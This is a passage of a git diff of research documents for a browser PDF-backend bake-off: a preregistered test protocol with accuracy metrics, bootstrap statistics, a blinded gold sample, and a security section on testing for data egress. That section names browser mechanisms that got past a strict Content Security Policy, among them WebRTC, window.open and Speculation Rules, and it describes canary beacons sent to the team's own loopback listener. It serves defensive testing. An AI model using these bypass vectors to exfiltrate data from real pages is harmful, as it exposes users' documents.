B2 falls as far as B5 does, then -B2 and B5 are measuring the same thing and the association metric adds nothing. Same for S5 -against B6. - -Pre-committed verdicts: - -- **B1, B2, B3a, B5, B6** — a metric whose own sabotage does not move it **beyond that - metric's practical threshold** is **void for this run**, reported as void, and its Δ is - not published as evidence. -- **B7 and B8** have no Δ and no threshold; their controls (S6, S7) are pass/fail. A missed - flag voids that metric outright. -- **A1, A2, A4** — a gate its own sabotage does not fail is void, and a candidate's pass on - a void gate is not evidence of parity. -- Where a discriminating requirement fails, the two metrics involved are reported as - **not separable** — a different finding from either being blind, and it must not be - written as one. - -**Sabotage variants are scored as their own pseudo-backends. They are never pooled with the -candidates, never enter Δ, and never appear in a ranking table.** - -### Statistics: paired cluster bootstrap by bill - -Documents from one bill are correlated and some bills contribute far more documents than -others, so documents are not independent draws. - -| Element | Frozen choice | -|---|---| -| Resampling unit | **the bill**, sampled with replacement; all of a sampled bill's documents travel together | -| Statistic | **Δ = score(pdfminer) − score(pdfium-wasm)**, paired per document, defined once and never inverted | -| Aggregation | per-bill mean of the paired per-document Δ, then the **unweighted mean over sampled bills** | -| Secondary | document-weighted aggregation, reported as a sensitivity check only | -| Resamples | 10,000 | -| Seed | 20260805 | -| Interval | percentile 95 % CI on Δ | - -**Overlapping independent CIs are not evidence of anything and are not reported as such.** -That comparison is removed from the protocol. - -### Practical-effect thresholds, chosen before seeing any confirmatory result - -A backend **leads** on a metric only if **both** hold: the paired cluster-bootstrap 95 % CI -for Δ excludes zero, **and** |Δ̂| ≥ the threshold below. Statistical significance alone -never moves an architecture decision. - -| Metric | Threshold | Why this number | -|---|---|---| -| B1 text F1 | **0.010** | Residual headroom to the XML is ~0.087 (the settled format gap), so 0.010 is ~11 % of everything achievable — and ~1,800 tokens on a 180k-token enrolled bill | -| B2 heading F1 | **0.020** | `118-hr-4366/1` carries 48 accounts and 18 agencies; at that scale 0.02 F1 ≈ 1.3 headings, i.e. one account's worth of the financial data contract | -| B3a self-consistency | **0.005** | Line numbers are the staffer's citation handle; 0.005 on a 1,000-numbered-line document is 5 unciteable lines | -| B5 amount→heading | **0.010** | One amount in 100 filed under the wrong account is a wrong number in a staffer's table | -| B6 parent/child | **0.020** | Same unit as B2 | - -**If neither statistical nor practical superiority is established, the pre-committed -sentence is: "the backends are accuracy-indistinguishable on the available evidence."** -The exploratory 0.9131-vs-0.9126 ordering is below every threshold here and would be -reported as indistinguishable. - -### Repair mode for Concern B - -**Primary: `strict`. Secondary: `repaired`. The per-backend repair delta is reported for -both candidates on every metric.** A repair that lifts one backend by +0.0345 and every -other by 0.0000 is a fact about the metric, and burying it in a default is how the -exploratory ranking went wrong. - -### The soft-hyphen repair must be tested for false repairs - -Testing only whether a repair *helps* is testing one direction of a two-directional rule. - -**False-repair probe.** For every line-final unnamed glyph PDFium reports, join positionally -(page, baseline ±0.6 pt, x0 ±0.5 pt) to the other backends' glyph streams and read what they -resolve it to. **A repair is false when ≥ 2 other backends agree the glyph is not -hyphen-like** (`-`, U+2010, U+2011, U+00AD). - -- **Reported: false-repair count, rate, and the per-document distribution.** -- Run on P1 **and** P2 separately, because a positional rule that holds on one typesetting - class need not hold on another. **Gate B-R: the false-repair rate on the holdout may not - exceed the replication rate by more than 2×**; exceeding it means the rule is - corpus-shaped and must be reported as such. - -### Mandatory parameter-sensitivity tests - -| Parameter | Settings | Default | Rule for claiming a lead | -|---|---|---|---| -| `_SPACE_FACTOR` | 0.15, 0.20, **0.25**, 0.30, 0.40 | 0.25 | lead at **≥ 4 / 5** | -| `_BASELINE_TOL` | 0.1, 0.3, **0.6**, 1.2, 2.0 | 0.6 | lead at **≥ 4 / 5** | -| `_CHROME_SIZE_RATIO` | 0.0 (off), 0.45, **0.55**, 0.65 | 0.55 | lead at **≥ 3 / 4** | -| `upright` filter | on / off | on | **ranking must not reverse** | -| repair mode | strict / repaired | strict (Concern B) | **ranking must not reverse** | - -**Raw sensitivity magnitude is reported for every cell.** A backend whose metric moves by -**> 0.05** across a parameter's sweep is labelled **parameter-fragile on that metric**, next -to its score. - -**Sensitivity at an arbitrary alternate setting is not itself evidence of inaccuracy.** The -question the sweep answers is narrower: *does a claimed lead depend on a PDFium-tuned -default?* A lead that exists only at the default is reported as -*"leads at the default parameterization only"*. - -### Default-value audit — done before freezing, and it found two mismatches - -§7 of the review asked that every bold default be verified against the implementation. - -| Constant | Probe (`reconstruct.py`) | Production (`parsers/pdf_text.py`) | Verdict | -|---|---|---|---| -| `_SPACE_FACTOR` | 0.25 | **0.25** | **matches** — genuinely inherited from PDFium-tuned production | -| `_BASELINE_TOL` | 0.6 **points, absolute** | `_BASELINE_TOL_FACTOR = 0.5 × median glyph size`, **a fraction** | **different parameterization**, not a different value of the same knob | -| `_CHROME_SIZE_RATIO` | 0.55 | **no counterpart** — production strips chrome by regex on text | **spike-invented** | - -Consequence, pre-committed so it cannot be reinterpreted later: only `_SPACE_FACTOR` -supports the audit's "a PDFium-tuned constant inside the neutral layer" framing. Sensitivity -in the other two is a property of **this harness**, and a candidate that looks fragile there -is fragile in a layer production does not have. Both readings are reported; neither is -allowed to borrow the other's interpretation. - ---- - -# The gold sample - -PyMuPDF is a second implementation, not an oracle. This is the only reference in the -protocol that depends on neither a PDF library's text layer nor the XML. - -### Honest naming - -The review asked for a **human-adjudicated** gold sample. **No human is at the keyboard for -this run.** What is built is an **image-adjudicated gold sample**: the execution agent reads -page images and records the fields. Rendering uses **macOS CoreGraphics** (`sips` / -`qlmanage`), an implementation independent of PDFium, pdfminer, PyMuPDF and PDF.js. - -**This is weaker than human adjudication and is labelled that way in every table.** A -20-item seeded subsample is written to `results/gold_human_check.md` for Will to verify by -hand; **until he signs it off, every gold-derived number is published as provisional.** - -### Frozen construction - -1. **Frame.** The union of all six backends' outputs **and** the XML, over the - production-accepted P1 documents. Union rather than any one backend, so no candidate's - blind spot silently removes items from the frame — and items only one backend sees are - the most informative ones in it. -2. **Sampling.** Seeded shuffle within each stratum, seed **20260805**, first N taken. The - frame size and selection index of every item are recorded, so the sample is reproducible - without re-running the shuffle. -3. **Strata.** - - | Financial (50) | N | | Structural (50) | N | - |---|---|---|---|---| - | Backends disagree on the line | 10 | | Backends disagree on presence or level | 10 | - | Inside a long appropriations block (> 40 lines, no heading) | 8 | | Small-caps account headings | 12 | - | Within 3 lines of a heading transition | 8 | | Agency headings | 8 | - | Within 2 printed lines of a page boundary | 8 | | At a page boundary | 8 | - | On a line carrying a soft hyphen | 6 | | On a watermarked page | 6 | - | On a watermarked page | 6 | | Grouping / title headings | 6 | - | Table-like layout (≥ 3 numeric columns) | 4 | | | | - - Additions and deletions are drawn across both halves rather than as a stratum, so a - change item always carries its own before/after context. -4. **Recorded per item**: document; page; printed line number(s) where the page has them; - exact source text of the line; the heading / account / agency context as printed; the - amount as printed; and for change items the expected relationship. -5. **Blinding.** The frame is built from backend output, so the sampler knows every - candidate's answer. **The adjudicator must not.** The sampler writes two files: - - | File | Contents | Read by the adjudicator? | - |---|---|---| - | `gold_key.json` | item id → document, page, **which backends contributed and what each said**, XML value, stratum | **no** — committed, then not opened until scoring | - | `gold_blind.json` | item id → document, page, rendered image path, **a geometric locator (bounding box in PDF points)**, and the question | **yes — this is all it sees** | - - A blind record carries **no backend name, no candidate text, no XML value, and no stratum - label**. Localisation is by bounding box, because a box says *where to look* without - saying *what is there*. Items are presented in a seeded shuffle (20260805) across all - strata, so neighbouring items do not reveal which cell — and therefore which expected - difficulty — an item came from. - -6. **Ordering, enforced by hash rather than by intent.** The adjudicated answers are written - to `gold_adjudicated.json` and **committed, with their SHA-256 recorded, before - `gold_key.json` is joined to them**. The join is a separate committed script. The commit - order is the evidence that adjudication preceded exposure; "I adjudicated first" is not. -7. **Proof the gold set can fire.** Ten deliberately corrupted items (wrong amount, wrong - heading, wrong line number) go into a separate control file. **The scorer must flag all - ten.** A scorer that passes the control silently cannot distinguish a correct backend - from a broken comparison, and the run is void for B8. -8. **Blinding residue that cannot be removed, stated rather than papered over.** The - adjudicator is the same agent that has read `RESULTS.md` and therefore carries the - exploratory prior that pdfminer led the independent metrics. No file-level blinding - removes that. It is a standing limitation on B8, it is one of the reasons the 20-item - human check exists, and **B8 alone may never decide a ranking** — it corroborates or - contradicts B1–B6, which are computed without an adjudicator. - ---- - -# Concern C — security / egress - -### Threat model, stated before any policy is tested - -| | Threat A | Threat B | -|---|---|---| -| **What** | DeltaTrack accidentally or deliberately includes ordinary application networking | Arbitrary or malicious code executing inside the browser tries to exfiltrate document data through any browser capability | -| **What this run can establish** | **Strong controls.** A policy plus network-layer observation genuinely covers this | **Bounds, not impossibility.** The exploratory run already disproved impossibility via WebRTC and `window.open` | - -**Pre-committed: no result in this section may be written as "exfiltration is impossible", -"zero egress", or "permits no subresource or background network egress."** Every claim names -its policy or its environment. - -### Frozen policy under test - -``` -default-src 'none'; script-src 'self'; style-src 'unsafe-inline'; img-src data:; -connect-src 'none'; form-action 'none'; base-uri 'none'; object-src 'none'; -frame-src 'none'; worker-src 'none' -``` - -`script-src 'self'` **without** `'unsafe-inline'`. The exploratory policy included it and was -defeated by Speculation Rules as a direct result. The cost is real and is reported: the -engine must load from external script files, which complicates a single-file artifact. - -### Frozen vector set - -The union of [`vectors.js`](probes/vectors.js) (16) and [`vectors2.js`](probes/vectors2.js) -(19) — **35 mechanisms**, enumerated in those files so the list cannot drift from the code. -Coverage for the exploratory bypasses is retained by name and may not be dropped: -**WebRTC / STUN, `window.open`, top-level navigation, Speculation Rules.** - -**Adding a vector is encouraged and is not a deviation. Removing one is.** - -### Per-vector observability replaces the global control threshold - -The old rule ("control must leak on ≥ 12 of 35") let a vector that never worked in the -control be silently counted as "blocked by policy". In the exploratory round-2 run, five -vectors did exactly that (`link-dns-prefetch`, `link-preconnect`, `track`, `svguse`, -`webtransport`). - -**Every vector receives a control status first:** - -| Control status | Meaning | Eligible for "blocked by policy"? | -|---|---|---| -| **CONTROL TRANSMITTED** | the canary arrived at the server with no policy | **yes** | -| **CONTROL UNSUPPORTED** | the mechanism does not exist or threw in this browser | **no — not scored** | -| **CONTROL FAILED / VOID** | the mechanism ran but nothing arrived, cause unknown | **no — not scored** | - -Then, for each supported mechanism: execute it, transmit a **unique canary derived from a -dummy document**, and observe at the receiving network layer whether that canary arrives. - -**Canary format** (replacing the exploratory constant `secret=BILLTEXT`): -`DELTATRACK_SECRET__`. A per-vector unique value means a -received request proves *which* mechanism carried *document-derived* bytes, not merely that -some request happened. WebRTC is the one exception — a STUN binding request carries no -arbitrary payload — and is reported as **signal-only, not canary-bearing**. - -**Reporting shape**, all four columns always present: - -| vector | control | policy result | notes | -|---|---|---|---| -| … | transmitted marker | **blocked** | | -| … | transmitted marker | **bypasses CSP** | | -| … | transmitted marker | **outside CSP** | no directive governs it | -| … | unsupported | **not scored** | | - -**CDP request events are recorded as diagnostics and never decide**, because a request -object exists before CSP rules on it. The server's received-request log decides. - -### Frozen validity conditions - -A run is **void**, not negative, unless all four hold: - -1. **Per-vector control status assigned** for all 35, with at least one TRANSMITTED. -2. **Known-bad caught** — a build carrying the policy plus one deliberately permitted beacon - is detected. -3. **Vectors ran** — the fixture reports `DONE` and a vector count equal to the frozen set. - *(A `script-src` variant once reported "0 bypasses" with 0 vectors executed: the policy - had blocked the harness's own bootstrap. That is void, not a pass.)* -4. **Observation at the network layer**, over both TCP and UDP. - -### Environment-level isolation, as a separate and stronger claim - -Browser policy and environment isolation support different sentences, and conflating them is -the same error as conflating A with B. - -| Test | Claim it supports | -|---|---| -| Browser policy | "our app does not transmit through these mechanisms" | -| Environment isolation | "the process cannot reach the network at all" | - -**Frozen procedure.** Run a full PDF comparison with outbound networking denied outside the -page, and require it to **succeed**: - -- **Primary (available now): macOS `sandbox-exec` with `(deny network*)`.** Verified during - protocol design: a sandboxed `curl` to a public host fails DNS resolution. -- **Stronger (attempted): a Linux container with `--network none`.** The Docker daemon is - **not running** on this machine at freeze time; if it is unavailable at execution time this - is recorded as **NOT RUN**, never inferred from the macOS result. -**Proof the isolation check can fire.** An unsandboxed run reaching the observation server -proves only that the *server* works; it says nothing about whether the sandboxed run's -silence came from the sandbox or from a dead listener, and it is evidence gathered in a -different environment from the one under test. **Both halves must run, and both inside the -same invocation window:** - -| Control | Where it runs | Required outcome | What it establishes | -|---|---|---|---| -| **known-bad, inside the sandbox** | in the sandboxed process, alongside the comparison | **no request received** | the silence is attributable to the sandbox, not to the app happening not to call out | -| **observer liveness, outside the sandbox** | the harness process, same run, same listener, overlapping window | **request received** | the listener was alive and observing throughout — so "nothing received" means blocked, not unwatched | - -Neither alone is sufficient: the first cannot distinguish a working sandbox from a dead -listener, and the second cannot attribute anything to the sandbox. **A run missing either -control is void, not a pass.** - -Per the rule that a guard's probe must be inert if the guard fails open, both beacons target -`127.0.0.1:8973` — our own listener — carrying a canary. If isolation fails open, the worst -outcome is a loopback request we wanted to see anyway. - -A third check separates loopback from the network generally: **a sandboxed request to an -external host must fail to resolve**, so a pass cannot come from loopback being blocked by -something other than the policy. Verified during protocol design; re-run and recorded each -time. - ---- - -# Concern D — performance - -The exploratory gate-9 verdict for pdfminer **did not reproduce** (37.9 s, then 69.2 s, -against a 60 s ceiling). Absolute timings in this spike are not reproducible to better than -~1.5×. - -| Element | Frozen choice | -|---|---| -| Machine state | Load average **< 1.0** at start, verified and recorded. Above that, the run is **void** | -| Trials | **minimum of 5**, reported as min / median / spread. The **minimum** is the estimator | -| CPU time | recorded alongside wall time; material divergence means contention, and the run is void | -| Concurrency | one backend at a time, never alongside another probe | - -| Gate | Threshold | -|---|---| -| D-1 | Largest corpus document (`119-hr-1/1`, 1118 pp) extracts in **< 60 s**, min-of-5, in-browser | -| D-2 | Within **3×** the incumbent's native full-document time, min-of-5 | - -**A candidate whose min-of-5 straddles the ceiling is `UNRESOLVED`, never rounded.** That is -pdfminer's current state. Relative claims survive contention and may still be made; absolute -threshold claims may not. - ---- - -# Concern E — bundle size and architecture - -The axis the PDFium-WASM-vs-pdfminer decision most likely turns on, and the exploratory run -did not measure it. Build **real browser artifacts** for both finalists (plus PDF.js, whose -artifact is nearly free), then measure: - -| Measurement | Unit | -|---|---| -| Total artifact size | uncompressed / gzip / brotli bytes | -| Incremental backend size | bytes over a common Pyodide + DeltaTrack baseline | -| First load (cold cache) | ms to interactive | -| Repeat load (warm cache) | ms to interactive | -| Pyodide + package initialization | ms | -| Full comparison latency | ms, min-of-5, under the Concern-D idle rules | -| Peak memory | MB | -| JS↔Python transfer | bytes and copy count per document | -| `file://` behavior | works / degraded / fails, per artifact | - -**Pre-committed: do not optimize the 132 MB JS→Python glyph transfer in this run.** Measure -it first; optimize only if the measurement shows a real memory or latency problem. An -unmeasured optimization is how a spike acquires work nobody asked for. - ---- - -# Concern F — `@embedpdf/pdfium` release readiness - -Kept entirely separate from backend accuracy. Nothing here can rank a backend; it can only -gate adoption. - -| Item | What must be established | -|---|---| -| Source revision | the exact upstream revision corresponding to the shipped WASM | -| Fork provenance | what `embedpdf/runtime` is, and how it relates to upstream PDFium | -| Fork patches | the diff against upstream, reviewed | -| Licence obligations | full licence + NOTICE set for everything bundled | -| Vendored third-party | enumerated (`zlib` is confirmed present by string inspection; the rest is open) | -| Reproducibility | whether the shipped artifact can be rebuilt from source independently | -| Vendoring | whether DeltaTrack can vendor a reviewed, checksummed WASM | -| Disappearance | the recovery path if the package or fork goes away | - -**npm package metadata is a lead, not evidence.** The declared `repository.directory` -(`packages/pdfium`) does not exist in that repo's current `main`, and the npm licence (MIT) -disagrees with the upstream repo's own `LICENSING.md` (Apache-2.0 for `packages/`) — so the -metadata is already known to be unreliable here. - -**Pre-committed release-readiness requirement:** DeltaTrack must **either** independently -reproduce the WASM build **or** vendor a reviewed, version-pinned, checksummed artifact tied -to documented source and third-party notices. Failing both is a **blocker for shipping**, -never a mark against measured accuracy. - ---- - -# Cross-cutting rules - -1. **No composite score.** Not across concerns, not within one. -2. **Seeds fixed at 20260805** for every sample, shuffle and bootstrap. -3. **Environment recorded with the results**, and re-stated next to any number quoted - elsewhere. Still macOS 15 / arm64 until someone runs it on Windows. -4. **Raw outputs are immutable.** Every published table is generated from them by a - committed script, never transcribed. -5. **The exploratory record is not edited.** Corrections to it go in this run's results, - pointing at it. - -## Deviations - -Once execution starts, these may not change silently: populations; metrics; normalizations; -thresholds; default parameters; repair rules; sampling rules; holdout membership. - -Any change gets a row in `results/DEVIATIONS.md`, appended **when it happens**, not -reconstructed afterwards: - -| Column | Content | -|---|---| -| Change | exactly what changed, old → new | -| When | timestamp and stage | -| Results already visible? | **yes / no** — and which | -| Reason | why | -| Could move | which scores, rankings or gates | - -Then continue only if the result is still interpretable. If it is not, the affected numbers -are published as exploratory, not confirmatory. - ---- - -# Decision rules - -Applied in order. **"Best backend" is not an available output unless rule 1 fires.** - -1. If one candidate has a **clear, practically meaningful, independently validated** accuracy - advantage on **both** replication and holdout data, surface that tradeoff explicitly. -2. If independent accuracy is indistinguishable, then **migration risk, performance, bundle - size, maintainability and supply-chain risk become legitimate tie-breakers** — and the - decision is written as a tie-break, not as an accuracy finding. -3. **PDFium-WASM's exact production parity is evidence for migration safety, not for - independent correctness.** -4. **pdfminer's stronger exploratory independent metrics are evidence worth testing, not - proof that it is more accurate.** -5. **Every security conclusion names the exact policy or environment under which it holds.** - ---- - -# What this run cannot settle, by construction - -- **Genuine pre-publication material.** Chair's marks, discussion drafts and real committee - drafts do not exist in the repository and cannot be fetched; they need a congressional - contact. This is the material ADR 0010 says the PDF pipeline exists for. -- **Windows.** Everything is macOS 15 / arm64. -- **PDF.js's true capability**, since the operator-list adapter is not being built. -- **Real scanned/image-only PDFs.** The synthetic rasterized proxy can test safe failure and - nothing else. -- **Human-grade adjudication**, until Will signs off the 20-item check. - ---- - -# Reviewer reproduction kit - -The minimum another reviewer needs. Every command runs from the repo root with -`.venv/bin/python`; setup is in [`probes/README.md`](probes/README.md). - -| Goal | Artifact / command | -|---|---| -| **1. Verify protocol compliance** | This file at its freeze commit; `results/DEVIATIONS.md`; `results/holdout_membership.json`, committed before any score file. **Check `git log` order, not file timestamps**: `gold_adjudicated.json` must be committed before `gold_key.json` is joined to it, and that ordering is the only evidence the adjudication was blind | -| **2. Regenerate tables from raw output** | `probes/fill_results.py` — every table in the results document is generated, none transcribed | -| **3. Reproduce migration parity** | `probes/score_phase2.py` (13 accepted) and `probes/redteam_unguarded.py` (the 2 declined, guard bypassed). **SA1 / SA2 / SA3 must fail A1 / A2 / A4 respectively**; a gate its own sabotage does not fail is void | -| **4. Reproduce independent-accuracy statistics** | `probes/score_phase1.py` → `probes/report_confirmatory.py`, which emits Δ, the paired cluster-bootstrap CI, the practical-threshold verdict and **every B0 row (S1–S5, with the S4/S5 separability checks)** together. **A Δ table without its own metric's B0 row is not reviewable** | -| **5. Reproduce the security table** | `probes/redteam_egress2.py` and `probes/redteam_csp_mitigation.py` for the per-vector control/policy matrix; `probes/phase4_egress.py` for the environment-isolation run, which must carry **both** the inside-sandbox known-bad and the same-run observer-liveness control | - -**Independence.** The execution agent does not self-certify these conclusions. The -deliverables are: this frozen preregistration, immutable raw outputs, scripts that regenerate -every table, and a results document that keeps A / B / C / D / E / F apart — for review by a -separate model against the raw output, not against the summary. - ---- - -# Unresolved design choices - -Decisions the protocol had to make that a reviewer could reasonably make differently. Each is -frozen above; each is listed here so it is challenged rather than discovered. - -| # | Choice | Made | Alternative, and why it was not taken | -|---|---|---|---| -| 1 | Gold-sample adjudicator | **Agent reading CoreGraphics-rendered page images**, blinded to backend output by a two-file split and a commit-order proof, with a 20-item human check pending | True human adjudication of 100 items. Nobody is at the keyboard; blocking the run on it delivers nothing. The claim is downgraded and labelled, and B8 may not decide a ranking on its own | -| 2 | B3 line-number oracle | **Split**: B3a self-consistency (no reference) + B3b exactness on gold pages | The old "vs the page's own margin numbers" has no implementation — the exploratory metric scored against the **incumbent**. There is no corpus-scale margin-number oracle that is not a backend | -| 3 | PDF.js in A / B | **Excluded**; measured in E only | Building the operator-list adapter. It is a large piece of work with no concrete trigger, and it would delay every other answer | -| 4 | B metric weighting | **Bill-weighted** (per-bill mean, then mean over bills) | Document-weighted, which lets one 6-document bill dominate. Reported as a secondary sensitivity | -| 5 | Concern A primary mode | **`repaired`** — the mode we would ship | `strict`, which grades a migration against a mode nobody would ship. Strict stays as a diagnostic | -| 6 | B5 restricted to shared amounts | **Yes** | Scoring all amounts, which folds detection failures into an association metric and makes it un-interpretable | -| 7 | Quoted-block documents | **Own stratum**, excluded from primary B2/B5/B6 | Pooling them, which lets a known reference defect (DeltaTrack#11) decide a backend ranking on 30 of 52 documents | -| 8 | Holdout size | **12 bills** | More would be better and slower. The adequacy rule is what protects the claim, not the number | -| 9 | Synthetic P3b fixtures | **Safe-failure only** | Scoring accuracy on them, which would measure the synthesis rather than the backend | -| 10 | Environment isolation | **macOS `sandbox-exec`** primary, Linux container attempted | Requiring Docker, which is not running and would need Will to start it | diff --git a/docs/research/pdf-backend-bakeoff/PRE-REGISTRATION.md b/docs/research/pdf-backend-bakeoff/PRE-REGISTRATION.md deleted file mode 100644 index b312a951..00000000 --- a/docs/research/pdf-backend-bakeoff/PRE-REGISTRATION.md +++ /dev/null @@ -1,161 +0,0 @@ -# Pre-registration: metrics, materiality and pass thresholds - -Written **2026-08-05, before any accuracy result was computed**, as Phase 0 step 5 of -[`README.md`](README.md) requires. A bake-off whose metrics are chosen after the fact is -not a bake-off. - -## What had already been seen when this was written - -Stating this plainly, because "pre-registered" is worth nothing if the boundary is vague. -The spec deliberately orders the cheap kill-gates (Phase 0 steps 1-4) **before** -pre-registration, so the following were known: - -| Known | Value | -|---|---| -| PDFium-WASM FFI availability | All four required entry points exported and working | -| PDF.js whole-document cost | 1536 ms for 94 pages, incl. 408 ms `getOperatorList()` | -| pdfminer.six speed | 1.5x-3.3x the incumbent's native glyph walk | -| Incumbent extraction baseline | 5.8-10.9 s for a 1000+ page bill | -| All six adapters emit the contract | Yes, agreeing on line numbers over 6 pages | - -**No accuracy score, diff-agreement number, or per-document result had been computed.** -Everything below concerns accuracy, and none of it was informed by an accuracy result. - -One threshold, **gate 9 (performance)**, was necessarily set *after* seeing the speed -numbers, because the spec's own ordering puts that gate first. It is written as a -relative threshold for the reason given in its row, and that reasoning is stated so a -reader can judge whether the number was chosen to admit a favoured candidate. - ---- - -## Definitions - -### Material (gates 4 and 5) - -Gates 4 and 5 are unfalsifiable without this. A disagreement between the PDF-derived and -XML-derived diff is **material** if any of: - -- **(a) Money.** It is an `amount_entries` entry whose `old`, `new` or `kind` differs - between the two pipelines, or which is present in one and absent from the other. -- **(b) Provision text.** It is a change whose `text.old` or `text.new` differs between - pipelines by more than *typographic normalization* (see below). -- **(c) Whole change presence.** It is a change present in one pipeline and absent from - the other, **and** its text contains a dollar amount, a section or heading identifier, - or at least 20 non-whitespace characters of provision text. - -**Typographic normalization**, explicitly non-material: runs of whitespace; the glyph -mappings `normalize_glyphs` already performs (em/en dashes, smart quotes, paired -apostrophes); soft-hyphen rejoining; GPO margin line numbers; and letter-spacing inside -small-caps headings. - -Also **non-material by construction**, because the two pipelines are different artifacts -rather than two attempts at one artifact: `location` (the PDF carries page/line -coordinates, the XML carries none), `full_text_span` offsets, `anchor_resolution`, and -the ordering of changes. This follows the settled finding that PDF-vs-XML *output -parity* is impossible by design; the terminal metric is therefore scored on -structure-free content, not on coordinates. - -The 20-character floor in (c) exists to keep a single stray chrome fragment from -counting as a material error. It is the one arbitrary constant here, and every -disagreement it excludes is reported separately so the choice is auditable. - -### Agreement vs accuracy - -Reported separately and never conflated, per Trap 2: - -- **Agreement** = PDF-derived diff vs XML-derived diff. Cheap, computed for all pairs. -- **Accuracy** = adjudication of the *disputed subset* against ADR 0009's independently - authored committee reports. Only this may be called accuracy. - ---- - -## Metrics - -Every metric is computed on output of the **one** neutral reconstruction layer, so it -measures glyph-fact quality rather than a library's own text-assembly. - -### Phase 1, per document (N = 52) - -| # | Metric | Definition | -|---|---|---| -| M1 | Text recovery | Token-level F1 against the XML body text, both sides normalized (case preserved, whitespace collapsed, `normalize_glyphs` applied, margin numbers removed). Tokens, not characters: character similarity is dominated by whitespace and flatters every backend. | -| M2 | Line-number recovery | Recall and spurious rate over the set of `(page, line_number)` pairs, referenced to the incumbent through the same layer. Exact set comparison, not text similarity. | -| M3 | Heading tree | Node count and `level` distribution vs incumbent, plus the ADR 0014 money-conservation invariant on `_pdf_tree_payload` (own_amounts never over-count; drops bounded). | -| M4 | Breadcrumbs | `breadcrumb_for` agreement rate over the anchors the incumbent resolves. | -| M5 | Font-role separation | Share of numbered lines where the margin-number glyph's font differs from the line's body font. Scored as **role separation**, never name-string equality, because bodies are `DeVinne` in bills and `NewCenturySchlbk` in enrolled/committee prints. Empty-font-name rate reported per backend. | - -### Phase 2, terminal metric (N = 15 pairs) - -| # | Metric | Definition | -|---|---|---| -| T1 | Change-set agreement | Precision/recall/F1 of PDF-derived changes against XML-derived changes, matched on normalized `(change_type, text.old, text.new)`. | -| T2 | `amount_entries` agreement | Precision/recall/F1 over `(old, new, kind)` triples, aggregated per pair. Money is scored separately because it is the highest-consequence field. | -| T3 | Material disagreements | Count of disagreements meeting the materiality definition, listed individually for adjudication. | - -Reported **per bill**, never only as an aggregate: 15 pairs concentrate in `118-hr-4366` -(5), `113-hr-3547` (3) and `115-hr-5895` (2), so one bill would otherwise drive the -headline. - -### Strict vs repaired - -Every Phase 1 and Phase 2 number is computed **twice**: once in `strict` mode, where a -glyph the backend could not name stays U+FFFD, and once in `repaired` mode, where a -line-final unnamed glyph is read as a hyphen from position alone. The repair rule is -available to all backends equally and is a no-op for those that name the glyph. The -**gap between the two** is the measurement of a backend's glyph-naming deficit, and -collapsing it to one number would hide the single largest difference found so far. - ---- - -## Pass thresholds - -Hard gates. A backend passes or fails; ranking applies only among survivors. No weighted -composite: DeltaTrack is accuracy-sensitive, and a composite lets a missed appropriation -be offset by 200 ms of speed. - -| # | Gate | Threshold | Reference | -|---|---|---|---| -| 1 | Opens the corpus | 52/52 documents, no exception, no zero-glyph page beyond those the incumbent also reports empty | absolute | -| 2 | Line-number integrity | recall >= incumbent - 0.005 **and** spurious <= incumbent + 0.005 | **incumbent** (no-regression) | -| 3 | Structural conservation | ADR 0014 conservation holds on every document where it holds for the incumbent; heading-node count within 2% | **incumbent** (no-regression) | -| 4 | Material diff correctness | **Zero** adjudicated material errors across 15 pairs | **XML + ADR 0009** (correctness) | -| 5 | `amount_entries` | **Zero** adjudicated amount errors across 15 pairs | **XML + ADR 0009** (correctness) | -| 6 | Browser execution | Runs under Pyodide or natively in-browser and matches its own native result | absolute | -| 7 | Fully offline | Zero network requests, proven by a harness with a known-bad control | absolute | -| 8 | Licensing | Satisfies the project distribution policy | absolute | -| 9 | Performance | Largest corpus document within **3x** the incumbent's native extraction time, **and** projected Pyodide time <= 60 s | **incumbent**, relative | - -Gates 2 and 3 are **no-regression** gates measured against PDFium; gates 4 and 5 are -**correctness** gates measured against XML. They are different questions and are kept -labelled distinctly in the results. - -**Gate 9's threshold, and why it is relative.** The incumbent itself takes 5.8-10.9 s -natively on a 1000+ page bill, which is 9-21 s under the delivery spike's measured -1.6x-1.9x Pyodide penalty. An absolute "tens of seconds" rule would therefore disqualify -PDFium, which is not a coherent outcome for a no-regression exercise. 3x keeps a backend -in contention if it is the same order of magnitude as what ships today, and the 60 s -projected ceiling is the point past which a staffer would reasonably abandon a -comparison. Both numbers are stated so a reader can disagree with them explicitly. - ---- - -## Statistical power, stated up front - -Zero material failures across **15 pairs** is consistent, by the rule of three, with a -true material-failure rate as high as **~20% at 95% confidence**. This is reported -alongside any zero result. It is not an argument against the gate; it is the reason -Tier B is necessary rather than optional, and the reason the phrase "PDF is solved" -may not appear in the results regardless of how Tier A scores. - -## What would falsify the whole exercise - -The calibration gate. If the incumbent does not score near ceiling **through the neutral -layer**, the layer is wrong and no other number in this document means anything. That -check runs before any challenger is scored, and its result is reported first. - -One caveat the spec did not anticipate, recorded here before the gate runs: the premise -"PDFium is known-good" is true of PDFium *through its text API plus `normalize_raw`*, not -necessarily of its **glyph API**, which is what this bake-off actually measures. A -measured shortfall in PDFium's glyph facts is therefore a real finding rather than -automatic proof that the layer is broken, and the two are distinguished by whether the -other five backends show the same shortfall on the same input. diff --git a/docs/research/pdf-backend-bakeoff/README.md b/docs/research/pdf-backend-bakeoff/README.md deleted file mode 100644 index 9cdb757d..00000000 --- a/docs/research/pdf-backend-bakeoff/README.md +++ /dev/null @@ -1,677 +0,0 @@ -# Spike specification: browser PDF backend bake-off + zero-egress proof - -- Status: **run 2026-08-05. This file is the specification; the findings are in - [`RESULTS.md`](RESULTS.md).** Metrics were fixed in advance in - [`PRE-REGISTRATION.md`](PRE-REGISTRATION.md); licensing is recorded separately in - [`LICENSING.md`](LICENSING.md). -- The conclusion was then **adversarially audited** in [`RED-TEAM.md`](RED-TEAM.md), which - rejected the first draft's headline. Read that before acting on `RESULTS.md`. -- The spike's successors, in order: [`RESULTS-CONFIRMATORY.md`](RESULTS-CONFIRMATORY.md) - (pre-registered re-run), [`RESULTS-HYBRID.md`](RESULTS-HYBRID.md) (where the engine/ - DeltaTrack seam should sit), and then [`validation/README.md`](validation/README.md), a - three-phase falsification pass over that last one. **The seam question is not settled by - anything in this directory**; `validation/` carries the current state of it, including - where these documents are wrong. -- **This document was not rewritten to match the results**, deliberately: the value of a - pre-registered spec is that it can be read against the outcome, including where the - outcome contradicted it. Places it did: - - The Phase 0 gate expected PDFium-WASM might have no credible build exposing the FFI. - One exists and works. - - The measured note that "a strict CSP blocked all ten" vectors was taken with an - HTTP-only listener. With a UDP listener, WebRTC egress survives CSP — and with 19 - further vectors, so do 